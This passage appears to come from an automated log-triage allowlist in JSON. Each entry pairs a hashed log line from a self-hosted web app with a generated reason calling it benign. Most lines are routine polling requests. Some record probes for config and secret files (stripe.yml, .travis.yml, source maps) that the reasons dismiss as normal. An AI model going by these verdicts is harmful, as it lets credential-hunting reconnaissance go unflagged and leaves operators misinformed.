"39a75a97d324a3a538bd48b19441acf96990e3e879c44eac252365ed7b4f2473": { "type": "hash", "value": "39a75a97d324a3a538bd48b19441acf96990e3e879c44eac252365ed7b4f2473", "source": "auto", "reason": "HTTP GET to an expected API endpoint returning 304 (Not Modified) with a normal response time; appears to be routine client caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.979 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:36.690924606Z" }, "39bb8ba00a337ede4332243c7855ae4196dbbd571a3056c08bed4ffeb5a61519": { "type": "hash", "value": "39bb8ba00a337ede4332243c7855ae4196dbbd571a3056c08bed4ffeb5a61519", "source": "auto", "reason": "Looks like a routine authenticated API request returning HTTP 304 (not modified) with a measured latency; no obvious exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.333 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:45.736753074Z" }, "39d786e01c3541823d29dc3447dfad6eab5331f5f8963e9187e00ccb1865343e": { "type": "hash", "value": "39d786e01c3541823d29dc3447dfad6eab5331f5f8963e9187e00ccb1865343e", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified); response time is normal and no error indicators are present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 32.368 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:30.965100625Z" }, "39f9ad878953ac8efcaf472a8b2cdc0153b634121d89db2a07df91e4fc84de83": { "type": "hash", "value": "39f9ad878953ac8efcaf472a8b2cdc0153b634121d89db2a07df91e4fc84de83", "source": "auto", "reason": "HTTP GET to an internal API endpoint returning 304 (not modified) with a typical response time; looks like routine polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.482 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:45.810222105Z" }, "3a0a084b49b9868a488027168114265b8a4f24f791ca18a67a58ee31c4b07e27": { "type": "hash", "value": "3a0a084b49b9868a488027168114265b8a4f24f791ca18a67a58ee31c4b07e27", "source": "auto", "reason": "Appears to be a routine HTTP GET returning 304 (not modified) with a normal response time and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.751 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:57.84586627Z" }, "3a49b5090562b60ea60325038d45583ea7575d415b7f6a264114f8e63c39f20a": { "type": "hash", "value": "3a49b5090562b60ea60325038d45583ea7575d415b7f6a264114f8e63c39f20a", "source": "auto", "reason": "Appears to be a routine HTTP GET to an application logs endpoint returning 304 (not modified), with a typical latency field.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 25.811 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:45.751052767Z" }, "3ac5e1c7a63bdde0f1eac55ddd8b5859be1d7a5c35df711b2763baa18e7ff194": { "type": "hash", "value": "3ac5e1c7a63bdde0f1eac55ddd8b5859be1d7a5c35df711b2763baa18e7ff194", "source": "auto", "reason": "HTTP GET request to an internal API endpoint returning 304 (not modified); looks like normal polling/cache validation traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.123 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:42.665459399Z" }, "3bf42d0419ae0e51d5672a12467363388f8e09422e65c5f95b3b85522a03f187": { "type": "hash", "value": "3bf42d0419ae0e51d5672a12467363388f8e09422e65c5f95b3b85522a03f187", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 (not modified) status and a normal low latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 31.020 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:18.878499148Z" }, "3c2088b485e3ebcb125b6ea99513906f89e9e368baed3b53fa5bd64a403ddf06": { "type": "hash", "value": "3c2088b485e3ebcb125b6ea99513906f89e9e368baed3b53fa5bd64a403ddf06", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint with an expected status code (304) and a normal latency measurement.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.038 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:19.010405619Z" }, "3c5ef4ced5b7d786ebfba368f1a1af33cd13f1bed63c6810c2c8bf580074a0e9": { "type": "hash", "value": "3c5ef4ced5b7d786ebfba368f1a1af33cd13f1bed63c6810c2c8bf580074a0e9", "source": "auto", "reason": "Regular HTTP GET request to /dashboard with a 404 response is common in web service logs; no anomalous patterns detected.", "original_line": "\u001b[0mGET /dashboard \u001b[33m404\u001b[\u003cDUR\u003e 0.611 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:00.227291587Z" }, "3c761859897946bd920cde0adac4e190ef1c625255ba7622b684d5dc4e6fff70": { "type": "hash", "value": "3c761859897946bd920cde0adac4e190ef1c625255ba7622b684d5dc4e6fff70", "source": "auto", "reason": "Appears to be a routine HTTP GET to a specific API endpoint returning 304 (not modified) with a small latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.215 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:54.696725976Z" }, "3c92d8361bd01d2a9f16fcc210f53c81997092d66af47ddeb29a3b3357b5bce2": { "type": "hash", "value": "3c92d8361bd01d2a9f16fcc210f53c81997092d66af47ddeb29a3b3357b5bce2", "source": "auto", "reason": "HTTP GET request to an internal API endpoint returning 304 (not modified) with a duration; appears to be normal access/logging for a containerized app.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 34.354 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:03.823295886Z" }, "3e52afa0b67cedd5dba4750b43b4ba8aff338e615574b7487b6c5307f8e223cd": { "type": "hash", "value": "3e52afa0b67cedd5dba4750b43b4ba8aff338e615574b7487b6c5307f8e223cd", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.424 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:12.668547617Z" }, "3e8b4d34fcfd4e154034afe23dec901b95463a6ef17b1531bf7bf37078493c05": { "type": "hash", "value": "3e8b4d34fcfd4e154034afe23dec901b95463a6ef17b1531bf7bf37078493c05", "source": "auto", "reason": "Routine HTTP GET to an API endpoint with a 304 status and normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.480 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:51.879925157Z" }, "3fd3c52b7cb25a21487769f5477143b6ec002b741b003cb7ef50071f53fb2372": { "type": "hash", "value": "3fd3c52b7cb25a21487769f5477143b6ec002b741b003cb7ef50071f53fb2372", "source": "auto", "reason": "Accessible asset not found (404) is a common benign event during web requests; nothing indicates malicious activity.", "original_line": "\u001b[0mGET /bundle.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.656 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:52.733471138Z" }, "3feecfaf86e91cd3e350f7c008e59fbf3346027def6ab5c71dffc8a11cc981b1": { "type": "hash", "value": "3feecfaf86e91cd3e350f7c008e59fbf3346027def6ab5c71dffc8a11cc981b1", "source": "auto", "reason": "HTTP 404 for a specific resource is a common, non-malicious event and likely normal in app traffic.", "original_line": "\u001b[0mGET /app/config/stripe.yml \u001b[33m404\u001b[\u003cDUR\u003e 2.076 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:24.764421095Z" }, "401f56443bd69099717e6bf6111943b503a6368c206b5aec2efed85fd58a5a9b": { "type": "hash", "value": "401f56443bd69099717e6bf6111943b503a6368c206b5aec2efed85fd58a5a9b", "source": "auto", "reason": "Routine HTTP GET to an application API endpoint with a normal 304 response and sub-second latency; appears like expected proxy/app logging.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.745 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:09.654530664Z" }, "40604d90a590b20135ccfb39c02e01b1cc448697317bc7ddbaf433a75b9e30e4": { "type": "hash", "value": "40604d90a590b20135ccfb39c02e01b1cc448697317bc7ddbaf433a75b9e30e4", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application API endpoint with a 304 response status and a latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 31.288 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:30.751059005Z" }, "40932dfb2d058f499bd4b82f25adece1591b86de77a703cc05fb83598809a788": { "type": "hash", "value": "40932dfb2d058f499bd4b82f25adece1591b86de77a703cc05fb83598809a788", "source": "auto", "reason": "Routine HTTP GET to an application logs API with a 304 response status and sub-second latency; appears normal for an API client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.590 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:30.91975514Z" }, "40b6e9c17db8af01c0170d0cd9885b8cd270159eb18c5aa6e16435963a70ca4f": { "type": "hash", "value": "40b6e9c17db8af01c0170d0cd9885b8cd270159eb18c5aa6e16435963a70ca4f", "source": "auto", "reason": "Normal HTTP 404 response to a signup page access; no anomalous or unauthorized behavior detected.", "original_line": "\u001b[0mGET /signup \u001b[33m404\u001b[\u003cDUR\u003e 1.814 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:57.000539577Z" }, "40c27a8951973232ac3ae65b1f56886152f0b6e010fcac0f9d783cda9d789699": { "type": "hash", "value": "40c27a8951973232ac3ae65b1f56886152f0b6e010fcac0f9d783cda9d789699", "source": "auto", "reason": "Appears to be a normal HTTP GET to an API endpoint with a 304 response and typical request timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.229 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:12.924938021Z" }, "40c903842355ec8995c8851552bc89164f6c14bf8f6e473648b5a6e3af25e681": { "type": "hash", "value": "40c903842355ec8995c8851552bc89164f6c14bf8f6e473648b5a6e3af25e681", "source": "auto", "reason": "Appears to be a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.015 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:21.74780645Z" }, "40edd49bc98d2b6aaf8c1f986e4a1f745936a2670f937bf6177600431e100ae3": { "type": "hash", "value": "40edd49bc98d2b6aaf8c1f986e4a1f745936a2670f937bf6177600431e100ae3", "source": "auto", "reason": "Looks like a routine HTTP GET request to an API endpoint with a 304 status and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.645 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:45.669424451Z" }, "40f7ba50f3674f10efab78a3a3b0c08589dbdc5b11882a607914e6a91bdb8522": { "type": "hash", "value": "40f7ba50f3674f10efab78a3a3b0c08589dbdc5b11882a607914e6a91bdb8522", "source": "auto", "reason": "Normal HTTP GET to manifest.json returning 200 with small duration and bytes", "original_line": "\u001b[0mGET /manifest.json \u001b[32m200\u001b[\u003cDUR\u003e 12.627 ms - 355\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T13:12:52.23975646Z" }, "428f72034007a17509a85574b504948b84704dc7df3864483c6c0a7125ff9295": { "type": "hash", "value": "428f72034007a17509a85574b504948b84704dc7df3864483c6c0a7125ff9295", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint with a 304 response and a low latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.637 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:15.694447403Z" }, "4341f748c8e9660278d19061d3c67b29d6f3fc4d2c8a673ad2db651282415ce6": { "type": "hash", "value": "4341f748c8e9660278d19061d3c67b29d6f3fc4d2c8a673ad2db651282415ce6", "source": "auto", "reason": " Typical successful API request to a Stripe-related endpoint with 200 status and small duration. No anomalies observed.", "original_line": "\u001b[0mGET /api/stripe.ts \u001b[32m200\u001b[\u003cDUR\u003e 0.599 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:37.181593668Z" }, "436d6c7eb820c429e87bf28ff62c638ff11d0f72d94105147629a7166f7d2497": { "type": "hash", "value": "436d6c7eb820c429e87bf28ff62c638ff11d0f72d94105147629a7166f7d2497", "source": "auto", "reason": "Routine HTTP GET request returning 304 (not modified); low latency indicates normal caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.284 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:24.823505077Z" }, "4378ec2a3ca0d9bfef4646d74098a2b1095db932683d5e0078375b33fc605954": { "type": "hash", "value": "4378ec2a3ca0d9bfef4646d74098a2b1095db932683d5e0078375b33fc605954", "source": "auto", "reason": "Normal HTTP 404 on a missing static asset (main.js.map) during typical web traffic; not indicative of attack.", "original_line": "\u001b[0mGET /main.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.710 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:00.726648648Z" }, "439149022f9fff11d236b0b71b92a5e410b0cd5bb13ba34e99a8b66bf08eb28c": { "type": "hash", "value": "439149022f9fff11d236b0b71b92a5e410b0cd5bb13ba34e99a8b66bf08eb28c", "source": "auto", "reason": "Routine HTTP GET request returning 304 (not modified) with a small response time; typical of normal app/API polling via the docker service logs.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.147 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:24.945533601Z" }, "43b82037adab66080c12a0af882ff339a843a67010253f3eca5374a0fa46a9e1": { "type": "hash", "value": "43b82037adab66080c12a0af882ff339a843a67010253f3eca5374a0fa46a9e1", "source": "auto", "reason": "Appears to be a routine HTTP GET to an API endpoint returning 304 (not modified) with a latency metric, typical of normal application polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.008 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:27.750241078Z" }, "44a37aa00c1da80e851ffff755826bf3d8bfabb01fd0245f877ac2857ec94ff5": { "type": "hash", "value": "44a37aa00c1da80e851ffff755826bf3d8bfabb01fd0245f877ac2857ec94ff5", "source": "auto", "reason": "Looks like a routine HTTP GET request with a 304 (not modified) response and low latency from a containerized web service.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.371 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:24.547295346Z" }, "44e552c7530a10ed2f039d515f8cce9ee7d81c5370699a69e069fa9c8991ab14": { "type": "hash", "value": "44e552c7530a10ed2f039d515f8cce9ee7d81c5370699a69e069fa9c8991ab14", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.566 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:00.563227987Z" }, "47b0862eef75a784e90b59ac27830ce208fed1d0967c7272f43c4cf511b94aad": { "type": "hash", "value": "47b0862eef75a784e90b59ac27830ce208fed1d0967c7272f43c4cf511b94aad", "source": "auto", "reason": "HTTP GET to application logs endpoint returning 304 (not modified) looks like normal cache revalidation from a web/API client.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.891 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:37.054515266Z" }, "47d43ddf99c872b93cc0aea502d0d995efc03afe5f4daa66c2a091180b845a0e": { "type": "hash", "value": "47d43ddf99c872b93cc0aea502d0d995efc03afe5f4daa66c2a091180b845a0e", "source": "auto", "reason": "A routine HTTP GET request for a hidden file resulting in a 404 is common and not indicative of an attack.", "original_line": "\u001b[0mGET /.travis.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.526 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:13.53534239Z" }, "48c59ac968702ffad416d02faf6ec758bc9f3c54c2185074fed362fc5612da73": { "type": "hash", "value": "48c59ac968702ffad416d02faf6ec758bc9f3c54c2185074fed362fc5612da73", "source": "auto", "reason": "Looks like a normal HTTP GET to an application API endpoint returning 304 (not modified) with a small response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.155 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:06.88249506Z" }, "48da4969be278ecc4e5f3de525a05a4a6b47860c2f89f3b4c72fda259f2777c3": { "type": "hash", "value": "48da4969be278ecc4e5f3de525a05a4a6b47860c2f89f3b4c72fda259f2777c3", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application logs endpoint returning 304 (not modified) with a short duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.142 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:42.776065445Z" }, "4a0762b2ad6934bc9c97c75ea106458743ba10a4a37d4b1d94eb8e49d0d82cf5": { "type": "hash", "value": "4a0762b2ad6934bc9c97c75ea106458743ba10a4a37d4b1d94eb8e49d0d82cf5", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified), with a normal request duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.888 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:51.689572326Z" }, "4a76e80cba9c04a641c99ed7cac6427e186fc9b29a630f332bb31b00070d4592": { "type": "hash", "value": "4a76e80cba9c04a641c99ed7cac6427e186fc9b29a630f332bb31b00070d4592", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint with a 304 response and typical latency timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.258 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:27.886199042Z" }, "4ac17b02a04d6a01f29c64d23017231f24e0677e4730fc93290bb4b68f82989b": { "type": "hash", "value": "4ac17b02a04d6a01f29c64d23017231f24e0677e4730fc93290bb4b68f82989b", "source": "auto", "reason": "Looks like a routine HTTP GET request that returned 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.947 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:43:09.68484639Z" }, "4b05332c5d777bb3fbb3c2a09123f950d4d4504fc54263fbb580d40f20be625f": { "type": "hash", "value": "4b05332c5d777bb3fbb3c2a09123f950d4d4504fc54263fbb580d40f20be625f", "source": "auto", "reason": "Standard successful HTTP GET response with status 200 and small response time; typical web server log.", "original_line": "\u001b[0mGET /index.html \u001b[32m200\u001b[\u003cDUR\u003e 0.723 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:43.280360415Z" }, "4bb9be978b73abed229b8dcccd70298543f4c49ee6eee88b645f2da06d30dbe1": { "type": "hash", "value": "4bb9be978b73abed229b8dcccd70298543f4c49ee6eee88b645f2da06d30dbe1", "source": "auto", "reason": "Appears to be a routine HTTP GET request from the application/API returning status 304 (not modified) with a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 34.328 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:03.734306459Z" }, "4c44494e36d91e8bc71198f93eb09e2b11bf850624ae1558716d30b9c6b5b0ac": { "type": "hash", "value": "4c44494e36d91e8bc71198f93eb09e2b11bf850624ae1558716d30b9c6b5b0ac", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.180 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:33.652196063Z" }, "4cda42eecd5b1e5bde0df6254360b2ec1277ed557aad98eafacf44a45b22c086": { "type": "hash", "value": "4cda42eecd5b1e5bde0df6254360b2ec1277ed557aad98eafacf44a45b22c086", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a normal 304 response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.764 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:28.074118422Z" }, "4cf7db2bed5186c4a044f3363456eeea97d7cf9ad667aab52c14af2d1d1fce87": { "type": "hash", "value": "4cf7db2bed5186c4a044f3363456eeea97d7cf9ad667aab52c14af2d1d1fce87", "source": "auto", "reason": "Looks like a normal HTTP GET request returning 304 (not modified) with a recorded response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.873 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:36.823226141Z" }, "4d99f09628c749a1d7d5e5b5fb0433b50efa9a7e30e3d7104ba4a265d849a907": { "type": "hash", "value": "4d99f09628c749a1d7d5e5b5fb0433b50efa9a7e30e3d7104ba4a265d849a907", "source": "auto", "reason": "Looks like a routine HTTP GET request to an API endpoint returning 304 (not modified) with a measured duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.975 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:45.626970472Z" }, "4e53b7c6ba8c5e36f71f1c457e105274d830f2e656a8209262cc7e714c84dd11": { "type": "hash", "value": "4e53b7c6ba8c5e36f71f1c457e105274d830f2e656a8209262cc7e714c84dd11", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified); duration present and format matches normal access logging.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.368 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:00.629029251Z" }, "4eaa8c11b41b03f7d8ca96835894c3d89e6d3f06e76431bdc98ffd226a03e02d": { "type": "hash", "value": "4eaa8c11b41b03f7d8ca96835894c3d89e6d3f06e76431bdc98ffd226a03e02d", "source": "auto", "reason": "Appears to be a routine HTTP GET returning 304 (Not Modified) with a typical response time; no signs of attack or failure.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.271 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:36.740091725Z" }, "4f7a849f1cf83528f9b15de95ff47a86a32621679126786e9dafb30a70d7c222": { "type": "hash", "value": "4f7a849f1cf83528f9b15de95ff47a86a32621679126786e9dafb30a70d7c222", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.807 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:06.790236431Z" }, "509d86836a65f15324937f0edfd0ebb27936c7ace674494dc7fe3c522ea575ea": { "type": "hash", "value": "509d86836a65f15324937f0edfd0ebb27936c7ace674494dc7fe3c522ea575ea", "source": "auto", "reason": "Normal HTTP GET request to root returning 200 health/status check.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.642 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T04:32:46.565468446Z" }, "50d249f98526a1472995039f384189e7875fedb807c92e171b684efc863e6bc1": { "type": "hash", "value": "50d249f98526a1472995039f384189e7875fedb807c92e171b684efc863e6bc1", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint with a 304 response and a typical latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.048 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:48.720195361Z" }, "50df0ec5ffad282f23b44b57aa241218784c3df40ca5257d6e5ce8db06c8e00d": { "type": "hash", "value": "50df0ec5ffad282f23b44b57aa241218784c3df40ca5257d6e5ce8db06c8e00d", "source": "auto", "reason": "Appears to be a routine HTTP GET returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.759 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:12.95467354Z" }, "50efac802f2afa72fa2f0d80c0a95fd53d25ec95ffd2f07dbfbe97301049cfb6": { "type": "hash", "value": "50efac802f2afa72fa2f0d80c0a95fd53d25ec95ffd2f07dbfbe97301049cfb6", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application logs endpoint returning 304 (not modified), with typical access-log timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.548 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:06.670485187Z" }, "51316d0e03e96273e15b95a8b1a10769d427b679c3546e1a44ee9f2c57fa7884": { "type": "hash", "value": "51316d0e03e96273e15b95a8b1a10769d427b679c3546e1a44ee9f2c57fa7884", "source": "auto", "reason": "Looks like a routine HTTP GET request to an API endpoint returning 304 (not modified) with a normal duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.775 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:48.758793868Z" }, "51b2ca81384364fcb5bf62de89052ef693da9d2ef5854424d7c6dbf4d61bf41d": { "type": "hash", "value": "51b2ca81384364fcb5bf62de89052ef693da9d2ef5854424d7c6dbf4d61bf41d", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (Not Modified); appears to be a normal client polling/caching behavior with measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.683 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:09.934664737Z" }, "51c859998744611044d9c2e74dd37b596e5c4d5d2a126e9baac08540e887db0a": { "type": "hash", "value": "51c859998744611044d9c2e74dd37b596e5c4d5d2a126e9baac08540e887db0a", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 200 with a normal latency and byte count.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[32m200\u001b[\u003cDUR\u003e 21.556 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:09.826274243Z" }, "534d440c212f950014952ef862a7ae6cca6e0069bfb84dc5b17dc87b3668f8d1": { "type": "hash", "value": "534d440c212f950014952ef862a7ae6cca6e0069bfb84dc5b17dc87b3668f8d1", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with a typical low duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.213 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:30.726618206Z" }, "535b1fdf2a592fe64137da55bee5ad398be02423703541b77062becf2cb219bc": { "type": "hash", "value": "535b1fdf2a592fe64137da55bee5ad398be02423703541b77062becf2cb219bc", "source": "auto", "reason": "Looks like a routine container command execution to run nginx config test (nginx -t).", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:35.433 pm \u001b[0mexecuteCommand Container: captain-nginx nginx -t", "created_at": "2026-03-19T22:31:38.744005062Z" }, "536c676b179750b27a06dda9cf48563179b0748c76c5964217860643aa0df3fe": { "type": "hash", "value": 